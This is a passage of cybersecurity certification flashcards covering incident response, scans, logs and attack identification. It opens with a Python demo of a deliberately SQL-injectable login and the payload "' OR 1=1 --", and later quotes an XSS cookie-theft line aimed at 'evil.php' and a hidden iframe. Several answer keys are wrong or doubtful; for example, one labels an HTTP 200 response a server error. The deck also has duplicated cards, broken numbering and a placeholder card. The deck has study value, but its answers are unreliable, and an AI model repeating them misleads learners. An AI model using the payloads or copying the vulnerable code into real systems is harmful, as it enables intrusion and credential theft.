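    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: user input stays data, never SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


PROBE_PASSWORD = "' OR 1=1 --"   # payload quoted on the card


def probe(conn):
    """(vulnerable result, safe result) for the card's password payload."""
    return (login_vulnerable(conn, "admin", PROBE_PASSWORD),
            login_safe(conn, "admin", PROBE_PASSWORD))


if __name__ == "__main__":
    print(probe(setup_db()))   # ('admin', None)
```

A login that succeeds with that password is the confirmation the analyst is after; it says nothing about buffer handling, default credentials or format strings, which is why the other three options do not fit the probe.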

42
Q
  1. The Chief Information Security Officer (CISO) has decided that all accounts with elevated privileges must use a longer, more complicated passphrase instead of a password. The CISO would like to formally document management’s intent to set this control level. Which of the following is the appropriate means to achieve this?

a. A control
b. A standard
c. A policy
d. A guideline

A

c. A policy

43
Q
  1. An analyst suspects a large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST?

a. Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated.
b. Draft and publish a notice on the company’s website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data.
c. Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted.
d. Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

A

d. Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

44
Q
  1. Given the following code:
    var adr = '../evil.php?breadomonster=' + escape(document.cookie);
    var query = "SELECT * FROM users WHERE name='smith'";

Which of the following types of attacks is occurring?

a. Privilege escalation
b. XSS
c. Session hijacking
d. MITM
e. SQL injection

A

b. XSS

45
Q
  1. Which of the following should be used to correlate multiple events from different regions, time zones, and time periods?

a. Snort
b. ArcSight
c. Imperva
d. Nessus

A

b. ArcSight

46
Q
  1. ** A security analyst is running a penetration test against a client’s external firewall. The analyst runs an attack that attempts to flood the firewall from multiple locations while denying access to others. Which of the following attacks did the analyst perform?

a. Fuzzing
b. DDoS
c. Ping of death
d. MITM

A

b. DDoS

47
Q
  1. A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usage, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, even though no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this?

a. Advanced persistent threat
b. Zero day
c. Trojan
d. Logic bomb

A

b. Zero day

48
Q
  1. A technician receives an alert indicating an endpoint is beaconing to a suspect dynamic DNS domain. Which of the following countermeasures should be used to BEST protect the network in response to this alert? (Select TWO)

a. Set up a sinkhole for that dynamic DNS domain to prevent communication.
b. Isolate the infected endpoint to prevent the potential spread of malicious activity.
c. Implement an internal honeypot to catch the malicious traffic and trace it.
d. Perform a risk assessment and implement compensating controls.
e. Ensure the IDS is active on the network segment where the endpoint resides.

A

a. Set up a sinkhole for that dynamic DNS domain to prevent communication.
b. Isolate the infected endpoint to prevent the potential spread of malicious activity.

49
Q
  1. ** After a review of user account activity, it appears certain user accounts were being used to access critical systems that are unrelated to the user’s roles and responsibilities. The user accounts in question were disabled, but then other user accounts were used to perform the same activity soon after. Which of the following is the BEST remediation to stop this violation?

a. Reconfigure Radius.
b. Implement MFA.
c. Upgrade to the latest TLS.
d. Salt password hashes.

A

b. Implement MFA.

50
Q
50.	A company installed a wireless network more than a year ago, standardizing on the same model APs in a single subnet. Recently, several users have reported timeouts and connection issues with Internet browsing. The security administrator has gathered some information about the network to try to recreate the issues with the assistance of a user. The administrator can ping every device on the network and confirms that the network is very slow.
Administrator’s PC: 192.168.1.20
User’s PC: 192.168.1.22
AP-Finance: 192.168.1.10
AP-Workshop: 192.168.1.11
AP-Lounge: 192.168.1.12
AP-Reception: 192.168.1.13
AP-Warehouse: 192.168.1.14
AP-IT: 192.168.1.15
Output
Interface: 192.168.1.20 --- 0xf
Internet Address Physical Address Type
192.168.1.4 1a-25-0d-df-c6-27 dynamic
192.168.1.5 1a-25-0d-df-c8-00 dynamic
192.168.1.10 00-dc-3b-67-81-1a dynamic
192.168.1.11 c4-02-03-a1-4a-01 dynamic
192.168.1.12 00-dc-3b-67-82-02 dynamic
192.168.1.13 00-dc-3b-a5-ba-0b dynamic
192.168.1.14 00-dc-3b-67-88-07 dynamic
192.168.1.15 00-dc-3b-67-80-0a dynamic
192.168.1.20 1a-25-0d-df-8d-82 dynamic
192.168.1.22 1a-25-0d-df-89-cb dynamic
Given the above result, which of the following should the administrator investigate FIRST?

a. The AP-Workshop device
b. The AP-Reception device
c. The device at 192.168.1.4
d. The AP-IT device
e. The user’s PC

A

b. The AP-Reception device

51
Q
  1. A security analyst’s daily review of system logs and SIEM showed fluctuating patterns of latency. During the analysis, the analyst discovered recent intrusion attempts related to malware that overwrites the MBR. The facilities manager informed the analyst that a nearby construction project damaged the primary power lines, impacting the analyst’s support systems. The electric company has temporarily restored power, but the area may experience temporary outages. Which of the following issues should the analyst focus on to continue operations?

a. Updating the ACL
b. Conducting backups
c. Virus scanning
d. Additional log analysis

A

b. Conducting backups

52
Q
  1. ** In comparison to non-industrial IT vendors, ICS equipment vendors generally:

a. Rely less on proprietary code in their hardware products.
b. Have more mature software development models.
c. Release software updates less frequently.
d. Provide more extensive vulnerability reporting.

A

c. Release software updates less frequently.

53
Q
  1. During routine network reconnaissance that is looking for unused but open ports, a company’s scans generate the following packet captures:
    132 17.816492 192.168.1.132 192.168.1.1 TCP 58 49151 -> 22 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    133 17.816942 192.168.1.132 192.168.1.1 TCP 58 49151 -> 445 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    134 17.818683 192.168.1.1 192.168.1.132 TCP 58 22 -> 49151 [SYN, ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1460
    135 17.819546 192.168.1.132 192.168.1.1 TCP 58 49151 -> 80 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    136 17.824887 192.168.1.1 192.168.1.132 TCP 54 445 -> 49151 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
    137 17.829763 192.168.1.1 192.168.1.132 TCP 54 80 -> 49151 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
    138 22.063352 192.168.1.1 192.168.1.132 TCP 58 [TCP Retransmission] 22 -> 49151 [SYN, ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1460
    Which of the following is the BEST reason for the retransmission in packet 138?

a. Port 22 is closed, and 192.168.1.1 is attempting to complete the closure.
b. Port 22 is open, and 192.168.1.132 is attempting to continue the handshake.
c. Port 22 is closed, and 192.168.1.132 is attempting to complete the closure.
d. Port 22 is open, and 192.168.1.1 is attempting to continue the handshake.

A

b. Port 22 is open, and 192.168.1.132 is attempting to continue the handshake.

54
Q
  1. ** An organization has a policy prohibiting remote administration of servers where web services are running. One of the Nmap scans is shown here:
    Starting Nmap 4.67 (http://nmap.org) at 2011-11-03 18:32 EDT
    Nmap scan report for 192.168.1.13
    Host is up (0.00066s latency).
    Not shown: 992 closed ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    3306/tcp open  mysql
    MAC Address: 01:AA:FB:23:21:45
    Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds
    Given the organization’s policy, which of the following services should be disabled on this server?

a. rpcbind
b. netbios-ssn
c. mysql
d. ssh
e. telnet

A

d. ssh

55
Q
  1. ## A system’s authority to operate (ATO) is set to expire in four days. Because of other activities and limited staffing, the organization has neglected to start reauthorization activities until now. The cybersecurity group just performed a vulnerability scan with the partial set of results shown below.
    Scan Host: 192.168.1.13
    15-Jan-16 08:12:10.1 EDT
    Vulnerability CVE-2015-1635
    HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and
    Windows Server 2012 allows remote attackers to execute arbitrary code via crafted HTTP
    requests, aka “HTTP.sys remote code execution vulnerability”
    Severity: 10.0 (high)
    Expected Result: enforceHTTPValidation=’enabled’;
    Current Value: enforceHTTPValidatoin=enabled;
    Evidence:
    C:\8system8\windows\config\web.config
    ———

a. Remediate by going to the web.config file, searching for the enforce HTTP validation setting, and manually updating it to the correct value.
b. Accept this risk for now because this is a “high” severity, but testing will require more than the four days available, and the system ATO needs to be completed.
c. Ignore it. This is a false positive, and the organization needs to focus its efforts on other findings.
d. Ensure HTTP validation is enabled by rebooting the server.

A

a. Remediate by going to the web.config file, searching for the enforce HTTP validation setting, and manually updating it to the correct value.

56
Q
  1. ** A security administrator has uncovered a covert channel used to exfiltrate confidential data from an internal database server through a compromised corporate web server. Ongoing exfiltration is accomplished by embedding a small amount of data extracted from the database into the metadata of images served by the webserver. File timestamps suggest that the server was initially compromised six months ago using a common server misconfiguration. Which of the following BEST describes the type of threat being used?

a. APT
b. Zero-day attack
c. Man-in-the-middle attack
d. XSS

A

a. APT

57
Q
  1. ** A security analyst has been asked to scan a subnet. During the scan, the following output was generated:
    [root@scanbox-]# nmap 192.168.100.*
    Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2015-10-10 19:10 EST
    Interesting ports on purple.company.net (192.168.100.145):
    Not shown: 1677 closed ports
    PORT    STATE SERVICE
    22/tcp  open  ssh
    53/tcp  open  domain
    111/tcp open  rpcbind
    Interesting ports on lemonyellow.company.net (192.168.100.214):
    Not shown: 1676 closed ports
    PORT    STATE SERVICE
    22/tcp  open  ssh
    80/tcp  open  http
    111/tcp open  rpcbind
    443/tcp open  ssl/http
    Nmap finished: 256 IP addresses (2 hosts up) scanned in 7.223 seconds
    Based on the output above, which of the following is MOST likely?

a. 192.168.100.214 is a secure FTP server.
b. 192.168.100.214 is a web server.
c. Both hosts are mail servers.
d. 192.168.100.145 is a DNS server.

A

b. 192.168.100.214 is a web server.

58
Q
  1. ** A company uses a managed IDS system, and a security analyst has noticed a large volume of brute force password attacks originating from a single IP address. The analyst put in a ticket with the IDS provider, but no action was taken for 24 hours, and the attacks continued. Which of the following would be the BEST approach for the scenario described?

a. Draft a new MOU to include response incentive fees.
b. Reengineer the BPA to meet the organization’s needs.
c. Modify the SLA to support organizational requirements.
d. Implement an MOA to improve vendor responsiveness.

A

c. Modify the SLA to support organizational requirements.

59
Q
  1. ** The help desk has reported that users are reusing previous passwords when prompted to change them. Which of the following would be the MOST appropriate control for the security analyst to configure to prevent password reuse? (Select TWO)

a. Implement mandatory access control on all workstations.
b. Implement role-based access control within directory services.
c. Deploy Group Policy Objects to domain resources.
d. Implement scripts to automate the configuration of PAM on Linux hosts.
e. Deploy a single sign-on solution for both Windows and Linux hosts.

A

c. Deploy Group Policy Objects to domain resources.

d. Implement scripts to automate the configuration of PAM on Linux hosts.

60
Q
  1. ** A vulnerability scan comes back with critical findings for a Microsoft SharePoint server.
    Vulnerable software installed: Office 2007
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000021096F0100000100000000F01FEC\InstallProperties - key exists
    The Office component Microsoft Office Excel Services Web Front End Components is running an affected version - 12.0.6612.1000

Which of the following actions should be taken?

a. Remove Microsoft office from the server.
b. Document the finding as an exception.
c. Install a newer version of Microsoft Office on the server.
d. Patch Microsoft Office on the server.

A

d. Patch Microsoft Office on the server.

61
Q
  1. ** A vulnerability scan report shows a vulnerable version of Apache on a Linux server. The analyst validates the version by retrieving the server’s banner. The server’s administrator verifies that all available updates have been installed, but an attempt to exploit the vulnerability fails. Which of the following MOST likely occurred?

a. The vulnerability scanner is unable to properly establish a connection to the server.
b. The scanner agent was improperly installed.
c. The Apache server was patched before the scan was completed.
d. The package manager includes backported versions of Apache.

A

d. The package manager includes backported versions of Apache.

62
Q
  1. ** Which of the following organizations would have to remediate embedded controller vulnerabilities?

a. Banking institutions
b. Public universities
c. Regulatory agencies
d. Hydroelectric facilities

A

d. Hydroelectric facilities

63
Q
  1. ** Which of the following is a security concern found PRIMARILY in virtual infrastructure?

a. Two-factor authentication for network resources
b. Physical hardware supporting multitenancy
c. Airgapped system that will not run on the hypervisor
d. User access to outside resources

A

b. Physical hardware supporting multitenancy

64
Q
  1. ** A security analyst is assisting in the redesign of a network to make it more secure. The solution should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented?

a. System isolation
b. Honeypot
c. Jump box
d. Mandatory access control

A

c. Jump box

65
Q
  1. ** Which of the following BEST describes why vulnerabilities found in ICS and SCADA can be difficult to remediate?

a. ICS/SCADA systems are not supported by the CVE publications.
b. ICS/SCADA systems rarely have full security functionality.
c. ICS/SCADA systems do not allow remote connections.
d. ICS/SCADA systems use encrypted traffic to communicate between devices.

A

b. ICS/SCADA systems rarely have full security functionality.

68
Q
  1. ** In the development stage of the incident response policy, the security analyst needs to determine the stakeholders for the policy. Which of the following would be the policy stakeholders?

a. Human resources, legal, public relations, management
b. Chief Information Officer (CIO), Chief Executive Officer (CEO), the board of directors, stockholders
c. IT, human resources, security administrator, finance
d. Public information officer, human resources, audit, customer service

A

b. Chief Information Officer (CIO), Chief Executive Officer (CEO), the board of directors, stockholders

69
Q
  1. ** After reviewing security logs, it is noticed that sensitive data is being transferred over an insecure network. Which of the following would a cybersecurity analyst BEST recommend that the organization implement?

a. Use a VPN.
b. Update the data classification matrix.
c. Segment the networks.
d. Use a FIM.
e. Use a digital watermark.

A

a. Use a VPN.

70
Q
  1. ** The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files:
    Locky.js
    xerty.ini
    xerty.lib
    Further analysis indicates that when the .zip file is opened, it installs a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices?

a. Disable access to the company VPN
b. Move the files from the NAS to a cloud-based storage solution
c. Set permissions on file shares to read-only
d. Add the URL included in the .js file to the company’s web proxy filter

A

d. Add the URL included in the .js file to the company’s web proxy filter

71
Q
  1. ** A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops. Which of the following tools would be appropriate to use in this case?

a. MBSA
b. SHA1sum
c. FIM
d. DLP

A

c. FIM

72
Q
  1. ** As part of its SDLC, an organization scans all new applications for the OWASP Top 10 vulnerabilities. A new application shows no vulnerabilities via this process and is placed into production. An independent penetration test identifies several network layer vulnerabilities. Which of the following is the MOST likely cause?

a. The vulnerability scanner should have utilized a credentialed scan.
b. The OWASP Top 10 does not include methods to detect this class of vulnerability.
c. The scanner cannot see the traffic used by the application because it is configured to use SSL/TLS.
d. The application is not subject to PCI, so it doesn’t need to be scanned at the network layer.

A

b. The OWASP Top 10 does not include methods to detect this class of vulnerability.

73
Q
  1. ** An organization suspects it has had a breach, and it is trying to determine the potential impact. The organization knows the following:
    - The source of the breach is linked to an IP located in a foreign country.
    - The breach is isolated to the research and development servers.
    - The hash values of the data before and after the breach are unchanged.
    - The affected servers were regularly patched, and a recent scan showed no vulnerabilities.
    Which of the following conclusions can be drawn with respect to the threat and impact? (Select TWO)

a. The confidentiality of the data is unaffected.
b. The threat is an APT.
c. The source IP of the threat has been spoofed.
d. The integrity of the data is unaffected.
e. The threat is an insider.

A

b. The threat is an APT.

d. The integrity of the data is unaffected.

74
Q
  1. ** A security analyst is monitoring authentication exchanges over the company’s wireless network. A sample of the Wireshark output is shown below:
    No Time Source Destination Protocol Info
    1345 191.12345 Cisco_91:aa Netgear_a5:ef EAP Request, Identity
    1350 191.12456 Netgear_a5:ef Cisco_91:aa EAP Response, Identity
    1355 191.12678 Cisco_91:aa Netgear_a5:ef EAP Request, LEAP
    1360 191.12890 Netgear_a5:ef Cisco_91:aa TLSv1.1 Client Hello
    ...
    2145 193.12345 fooHost barServer TCP GET ./login.jsp
    2150 193.12456 barServer TCP TCP Source port:80

    Which of the following would improve the security posture of the wireless network?

a. Using PEAP instead of LEAP
b. Using SSL 2.0 instead of TLSv1.1
c. Using .aspx instead of .jsp
d. Using UDP instead of TCP

A

a. Using PEAP instead of LEAP

75
Q
  1. ** In reviewing service desk requests, management has requested that the security analyst investigate the requests submitted by the new human resources manager. The requests consist of “unlocking” files that belonged to the previous human resources manager. The security analyst has uncovered a tool that is used to display file-level passwords. This tool is being used by several members of the service desk to unlock files. The content of these files is highly sensitive information pertaining to personnel. Which of the following BEST describes this scenario? (Select TWO)

a. Unauthorized data exfiltration
b. Unauthorized data masking
c. Unauthorized access
d. Unauthorized software
e. Unauthorized controls

A

c. Unauthorized access

d. Unauthorized software

76
Q
  1. ** A user received an invalid password response when trying to change the password. Which of the following policies could explain why the password is invalid?

a. Access control policy
b. Account management policy
c. Password policy
d. Data ownership

A

c. Password policy

77
Q
  1. ** Nmap done: 1 IP address (1 host up) scanned in 0.822 seconds
    Starting Nmap 4.11 (http://nmap.org) at 2011-11-03 18:34 EDT
    Interesting ports on host adminServer (192.168.1.15):
    PORT STATE SERVICE
    22/tcp open ssh
    139/tcp open netbios-ssn
    3306/tcp open mysql
    Service detection performed.
    Nmap done: 1 IP address (1 host up) scanned in 0.822 seconds
    Starting Nmap 4.11 (http://nmap.org) at 2011-11-03 18:35 EDT
    Interesting ports on host opsServer (192.168.1.16):
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    139/tcp open netbios-ssn
    1417/tcp open OpenSSH
    Service detection performed.
    Nmap done: 1 IP address (1 host up) scanned in 0.822 seconds
    Which of the following servers is out of compliance?

a. finServer
b. adminServer
c. orgServer
d. opsServer

A

d. opsServer

78
Q
  1. An analyst is conducting a log review and identifies the following snippet in one of the logs:
    Jun 10 07:09:10 databse1 sshd [24665] : Invalid user root from 101.79.130.213
    Jun 10 07:36:03 databse1 sshd [24901] : Invalid user root from 101.79.130.213
    Jun 10 07:42:44 databse1 sshd [24938] : Invalid user root from 101.79.130.213
    Jun 10 07:56:11 databse1 sshd [26570] : Invalid user root from 101.79.130.213
    Jun 10 08:02:55 databse1 sshd [30144] : Invalid user root from 101.79.130.213
    Which of the following MOST likely caused this activity?

a. SQL injection
b. Privilege escalation
c. Forgotten Password
d. Brute force

A

d. Brute force

79
Q
  1. ** An organization has a practice of running some administrative services on non-standard ports as a way of frustrating any attempts at reconnaissance. The output of the latest scan on host 192.168.1.13 is shown below:
    Starting Nmap 4.67 (http://nmap.org) at 2011-11-03 18:32 EDT
    Nmap scan report for 192.168.1.13
    Host is up (0.00066s latency).
    Not shown: 990 closed ports
    PORT STATE SERVICE
    23/tcp open ssh
    111/tcp open rpcbind
    139/tcp open netbios-ssn
    1417/tcp open OpenSSH
    3306/tcp open mysql
    MAC Address: 01:AA:FB:23:21:45
    Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds
    Which of the following statements is true?

a. Running SSH on the Telnet Port will now be sent across an unencrypted port.
b. Despite the result of the scan, the service running on port 23 is actually telnet and not SSH, and creates an additional vulnerability.
c. Running SSH on port 23 provides little additional security from running it on the standard port.
d. Remote SSH connections will automatically default to the standard SSH port.
e. The use of OpenSSH on its default secure port will supersede any other remote connection attempts.

A

c. Running SSH on port 23 provides little additional security from running it on the standard port.

80
Q
82.	** A cybersecurity analyst is currently checking a newly deployed server that has an access control list applied. When conducting the scan, the analyst received the following code snippet of results:
Mail Server1
Trying 192.168.2.2
Connected
GET / HTTP/1.0
HTTP/1.0 200 Document follows
Server: server/0.10
Connection: close
Set-cookie: testing=1; path=/
Which of the following describes the output of the scan?

a. The analyst has discovered a false Positive, and the status code is incorrect providing an OK message.
b. The analyst has discovered a True Positive, and the status code is correct providing a file not found error message.
c. The analyst has discovered a True Positive, and the status code is incorrect providing a forbidden message.
d. The analyst has discovered a False Positive, and the status code is incorrect providing a server error message.

A

d. The analyst has discovered a False Positive, and the status code is incorrect providing a server error message.

81
Q
  1. Employees at a manufacturing plant have been victims of spear phishing, but security solutions prevented further intrusions into the network. Which of the following is the MOST appropriate solution in this scenario?

a. Continue to monitor security devices.
b. Update antivirus and malware definitions.
c. Provide security awareness training.
d. Migrate email services to a hosted environment.

A

c. Provide security awareness training.

82
Q
  1. A security analyst received an email with the following key:
    Xj3XJ3LLc
    A second security analyst received an email with the following key:
    3XJ3xjcLLC
    The security manager has informed the two analysts that the email they received is a key that allows access to the company’s financial segment for maintenance. This is an example of:

a. dual control
b. private key encryption
c. separation of duties
d. public key encryption
e. two-factor authentication

A

e. two-factor authentication

83
Q
  1. *! A cybersecurity analyst was asked to review several results of web vulnerability scan logs.
    Given the following snippet of code:
    <iframe src="http://65.240.22.1" width="0" height="0" frameborder="0" tabindex="-1" title="empty" style="visibility:hidden; display:none"></iframe>
    Which of the following BEST describes the situation and recommendations to be made?

a. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name.
b. The security analyst has discovered an embedded iframe that is hidden from the user accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present.
c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.
d. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.

A

c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious.

84
Q
  1. ** A security analyst positively identified the threat, vulnerability, and remediation. The analyst is ready to implement the corrective control. Which of the following would be the MOST inhibiting to applying the fix?

a. Requiring a firewall reboot
b. Resetting all administrator passwords
c. Business process interruption
d. Full desktop backups

A

c. Business process interruption

85
Q
  1. ** The board of directors made the decision to adopt a cloud-first strategy. The current security infrastructure was designed for on-premises implementation. A critical application that is subject to the Federal Information Security Management Act (FISMA) of 2002 compliance has been identified as a candidate for a hybrid cloud deployment model. Which of the following should be conducted FIRST?

a. Develop a request for proposal
b. Perform a risk assessment
c. Review current security controls
d. Review the SLA for FISMA compliance

A

b. Perform a risk assessment

86
Q
  1. The development team recently moved a new application into production for the accounting department. After this occurred, the chief information officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporation’s quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring?

a. Security regression testing
b. User acceptance testing
c. Input validation testing
d. Static code testing

A

b. User acceptance testing

87
Q
  1. A human resources employee sends out a mass email to all employees that contains their personnel records. A security analyst is called in to address the concern of the human resources director on how to prevent this from happening in the future. Which of the following would be the BEST solution to recommend to the director?

a. Install a data loss prevention system, and train human resources employees on its use.
b. Provide PII training to all employees at the company. Encrypt PII information.
c. Enforce encryption on all emails sent within the company. Create a PII program and policy on how to handle data. Train all human resources employees.
d. Train all employees. Encrypt data sent on the company network. Bring in privacy personnel to present a plan on how PII should be handled.
e. Install specific equipment to create a human resources policy that protects PII data. Train company employees on how to handle PII data. Outsource all PII to another company. Send the human resources director to training for PII handling.

A

b. Provide PII training to all employees at the company. Encrypt PII information.

88
Q
  1. ** A software engineer has resigned and given two weeks’ notice. The organization is concerned the engineer may have taken proprietary code. Which of the following will BEST help the security analysts to determine if any code has been exfiltrated?

a. Terminate and immediately escort the engineer out of the building.
b. Develop a timeline of the engineer’s system and network activity.
c. Investigate when projects were checked out of the code repository by the engineer.
d. Dump the contents of RAM from the engineer’s workstation and review.

A

b. Develop a timeline of the engineer’s system and network activity.

89
Q
  1. During an investigation, an incident responder intends to recover multiple pieces of digital media. Before removing the media, the responder should initiate:

a. malware scans
b. secure communication
c. chain of custody forms
d. decryption tools

A

c. chain of custody forms

90
Q
  1. ** A security analyst receives a mobile device with symptoms of a virus infection. The virus is morphing whenever it is moved from sandbox to sandbox to analyze. Which of the following will help to identify the number of variations through the analysis life cycle?

a. Journaling
b. Hashing utilities
c. Log viewers
d. OS and process analysis
e. IOC tagging

A

e. IOC tagging

91
Q
  1. A company wants to replace its existing security infrastructure, including the firewall, IPS, and vulnerability scanner. A demo scanner from the new vendor is deployed. The analyst scans a device with the demo and legacy scanners and compares the results:
    Vulnerability                          Legacy Scanner   Demo Scanner
    Chrome <44.3.1532.34                   X
    Chrome <43.7.9786.72                   X
    Adobe Reader < 10                      X
    Microsoft SMB Remote Code Execution    X                X
    Apache < 2.4                           X                X
    Which of the following is MOST likely responsible for the discrepancy in results?

a. The demo scanner needs to be configured to run a credentialed scan.
b. The demo scanner needs to be configured as an exception in the IPS.
c. The demo scanner is cloud-based and cannot identify local vulnerabilities.
d. The legacy scanner is producing false positives and should be replaced.

A

a. The demo scanner needs to be configured to run a credentialed scan.

92
Q
  1. An analyst was investigating an attack that took place on the network. A user was able to access the system without proper authentication. Which of the following will the analyst recommend, related to management approaches, in order to control access? (Select THREE)

a. RBAC
b. LEAP
c. DAC
d. PEAP
e. MAC
f. SCAP
g. BCP

A

a. RBAC
c. DAC
e. MAC

93
Q
  1. The security team for a large, international organization is developing a vulnerability management program. The development staff has expressed concern that the new program will cause service interruptions and downtime as vulnerabilities are remedied. Which of the following should the security team implement FIRST as a component of the remediation process to address this concern?

a. Automated patch management
b. Change control procedures
c. Security regression testing
d. Isolation of vulnerable servers

A

c. Security regression testing

94
Q
  1. ** A worm was detected on multiple PCs within a remote office. The security analyst recommended that the remote office be blocked from the corporate network during the incident response. Which of the following processes BEST describes this recommendation?

a. Logical isolation of the remote office
b. Sanitization of the network environment
c. Segmentation of the network
d. Secure disposal of affected systems

A

c. Segmentation of the network

95
Q

:)

A

:)

96
Q
  1. A cybersecurity analyst is capturing an image of a machine that is possibly infected with web malware. During which of the following incident response phases does this occur?

a. Eradication
b. Analysis
c. Recovery
d. Post-incident

A

b. Analysis

97
Q
  1. ** An organization has a policy prohibiting remote administration of servers where web services are running. One of the Nmap scans is shown here:
    Starting Nmap 4.67 (http://map.org) at 2011-11-03 18:32 EDT
    Nmap scan report for 192.168.1.13
    Host is up (0.00066s latency).
    Not shown: 992 closed ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    3306/tcp open  mysql
    MAC Address: 01:AA:FB:23:21:45
    Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds
    Given the organization’s policy, which of the following services should be disabled on this server?

a. rpcbind
b. netbios-ssn
c. mysql
d. ssh
e. telnet

A

d. ssh

98
Q
  1. ** A threat intelligence analyst who works for an oil and gas company has received the following email from a superior.
    “We will be connecting our IT network with our ICS. Our IT security has historically been top of the line and this convergence will make the ICS easier to manage and troubleshoot. Can you please perform a risk/vulnerability assessment of this decision?”

Which of the following is MOST accurate regarding ICS in this scenario?

a. Convergence decreases attack vectors.
b. Integration increases the attack surface.
c. IT networks cannot be connected to ICS infrastructure.
d. Combined networks decrease efficiency.

A

b. Integration increases the attack surface.

99
Q
  1. A security analyst found a packet analysis tool developed by the DHS that is available without registration on file-share sites. Many reputable security sites recommend the tool. However, the DHS site requires registration in order to get the download link with integrity verification. Which of the following describes the method the analyst would use to ensure the tool downloaded from the file share is an exact copy of the tool DHS is providing?

a. Hashing
b. Encryption
c. Source authentication
d. Isolation

A

a. Hashing

100
Q
  1. A systems administrator is doing network reconnaissance of a company’s external network to determine the vulnerability of various services that are running. Sending some sample traffic to the external host, the administrator obtains the following packet capture:
    18 17.646496 67.53.200.1  67.53.20.12  TCP 58 47669 -> 22  [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    19 17.646944 67.53.200.1  67.53.200.12 TCP 58 47669 -> 445 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    20 17.648631 67.53.200.12 67.53.200.1  TCP 58 22 -> 47669  [SYN, ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1460
    21 17.648646 67.53.200.1  67.53.200.12 TCP 58 47669 -> 80  [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    22 17.648887 67.53.200.12 67.53.200.1  TCP 54 445 -> 47669 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
    23 17.649763 67.53.200.12 67.53.200.1  TCP 54 80 -> 47669  [RST, ACK] Seq=1 Ack Win=0 Len=0
    Based on the output, which of the following services should be further tested for vulnerabilities?

a. SSH
b. HTTP
c. SMB
d. HTTPS

A

c. SMB

101
Q
  1. ** A company is concerned about attacks in which an attacker impersonates a user by extracting password hashes. A security analyst has been tasked with mitigating this potential threat. Which of the following security controls would BEST mitigate this issue?

a. Salting the password hashes
b. Increasing bit length of the hashing algorithm
c. Multifactor authentication via smart cards
d. Policy requiring 15-character password

A

a. Salting the password hashes

102
Q
  1. An analyst has informed the Chief Executive Officer (CEO) of a company that a security breach has occurred. The risk manager was unaware and caught off-guard when the CEO asked for further information. Which of the following should be implemented to ensure the risk manager is knowledgeable of any future breaches?

a. Incident management
b. Lessons learned report
c. Chain of custody management
d. Change control process

A

a. Incident management

103
Q
  1. ** As part of its SDLC, an organization scans all new applications for the OWASP Top 10 vulnerabilities. A new application shows no vulnerabilities via this process and is placed into production. An independent penetration test identifies several network layer vulnerabilities. Which of the following is the MOST likely cause?

a. The vulnerability scanner should have utilized a credentialed scan.
b. The OWASP Top 10 does not include methods to detect this class of vulnerability.
c. The scanner cannot see the traffic used by the application because it is configured to use SSL/TLS.
d. The application is not subject to PCI, so it doesn’t need to be scanned at the network layer.

A

b. The OWASP Top 10 does not include methods to detect this class of vulnerability.

104
Q
  1. Management wants to scan servers for vulnerabilities on a periodic basis. Management has decided that the scan frequency should be determined only by vendor patch schedules and the organization’s application deployment schedule. Which of the following would force the organization to conduct an out-of-cycle vulnerability scan?

a. Newly discovered PII on a server
b. A vendor releases a critical patch update
c. A critical resource utilization in the organization’s application
d. False positives identified in production

A

b. A vendor releases a critical patch update

105
Q
